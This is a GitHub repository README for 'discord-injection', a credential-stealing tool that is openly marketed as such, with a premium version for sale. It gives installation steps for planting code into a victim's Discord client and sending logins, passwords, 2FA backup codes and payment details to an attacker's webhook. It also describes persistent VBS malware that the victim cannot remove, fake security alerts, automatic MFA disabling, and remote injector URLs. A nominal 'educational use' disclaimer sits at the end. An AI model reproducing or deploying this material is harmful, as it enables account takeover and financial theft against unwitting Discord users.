Skip to content

k4itrun/discord-injection

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

47 Commits
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
injection.js
injection.js
 
 

Repository files navigation

Discord Injection

Interception of Discord HTTP Requests, Including Backup Code Retrieval and Deceptive User Alerts for Vulnerabilities, Among Other Techniques!

Overview

Discord Injection is a tool designed to showcase the interception of HTTP requests within the Discord application. This tool highlights potential vulnerabilities by capturing critical actions and interactions that occur within Discord.

Key Features

  • Persistence and Startup:

    • Once the victim is injected, and everything is perfect, they simply will not be able to remove the injection.
    • Persistence works in such a way that once the user starts their Discord application, an executable is simply created that will check if it contains an injection. If so, it will not be modified, but if not, it will be injected again More information here

  • Forced mail change & edit user:

    • If this setting is enabled in the automatic change mail injection, then the victim will see a fake security alert & Also if the automatic user modification configuration is active, user data will be modified

  • Login & Authentication:

    • Intercept login, registration, and two-factor authentication (2FA) requests.

  • Account Management:

    • Capture requests related to email and password changes.

  • Security codes:

    • Obtains all the victim's security codes at capture time.

  • Payment Information:

    • Monitor credit card and PayPal addition requests.

  • Security Measures:

    • Automatic logout after the initial injection to prevent unauthorized access.
    • QR Code login prevention to enhance security.
    • Block requests that reveal device information.

Installation Guide

  1. Close Discord: Ensure that Discord is completely closed before proceeding.

  2. Copy the Injection Code:

    • Download the injection code and insert it into your Discord desktop core. Navigate to: 
      %APPDATA%\Local\Discord\app-<app-version>\modules\discord_desktop_core-<core-version>\discord_desktop_core\index.js

  3. Configure Setup:

    • Replace %WEBHOOK_URL% in the injected code with your Discord webhook URL. This webhook will receive the intercepted information.

    • Replace %API_URL% with our api you can get a unique url where you will get detailed information of the victims.

    • Replaces data like %AUTO_USER_PROFILE_EDIT%, %AUTO_EMAIL_UPDATE% which are a separate configuration in case you want to have an improvement in the attack.

    • Important this do not change it

      injection_url: "https://raw.githubusercontent.com/k4itrun/discord-injection/main/injection.js",
injector_url: "https://raw.githubusercontent.com/k4itrun/discord-vbs-injector/main/injector.vbs",

  4. Restart Discord: Launch Discord again to apply the changes.

Usage

  • Node.js Injector:
    • For a more feature-rich injector based on Node.js, visit Wish Stealer. It's a free tool with extensive capabilities.

Startup

  • Persistence Vbs Malware:

    • Once the victim is injected, several instances will be created on the PC in parallel, simply once the victim is trapped they will not be able to leave.

    An autostart task is created on multiple routes as in

    %APPDATA%\Microsoft\Protect
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    • Firstly, the Injector Malware will be stored here and will be executed whenever the PC starts.

Preview

Auto Mfa Disabler

if(CONFIG.auto_mfa_disabler === 'true') {
    await delay(5000);

    const autoMfadisablerToken = await autoMfadisabler(response, token, 'backup');

    content = {
        content: `**${user.username}** mfa was deactivated automatically!`,
        embeds: [{
            fields: [
                { name: "Password", value: `\`${password}\``, inline: true },
                { name: "Email", value: `\`${email}\``, inline: true },
            ],
        }],
    };

    notify(content, autoMfadisablerToken, user);    
};

If you are interested in an improved version with more features such as auto mfa deactivator and premium options you can buy it

Contributing

We welcome your contributions to this project! If you have suggestions or improvements, please feel free to open an issue or submit a pull request with your changes. Your involvement from the community is highly valued.

If you’d like to support the development of this project, consider leaving a star ⭐ or making a donation. Every bit of support is greatly appreciated!

Contact

For inquiries, reach out at [email protected] or join our Discord Server.

License

This software is licensed under the MIT License.

Disclaimer

Important Notice: Educational Use Only.

This tool is designed solely for educational purposes. Any misuse of this tool is strictly prohibited. By using this tool, you acknowledge and accept these terms.

User Accountability:

By utilizing this tool, you take full responsibility for your actions. The creator disclaims any liability for misuse. It is your responsibility to ensure that your use of this software complies with all applicable laws and regulations.

No Assistance:

The creator will not provide assistance or support for any misuse of this tool. Any inquiries related to harmful or illegal activities will be ignored.

Terms Acceptance:

By using this tool, you agree to abide by this disclaimer. If you do not agree with these terms, please do not use the software.

About

Discord-injection Premium and unique features

discord.gg/BYANEGfyCu

Topics

electron js core discord injection injection-js pishing discord-injection discord-injection-premium codes-backup

Resources

Readme

License

MIT license
Activity

Stars

7 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages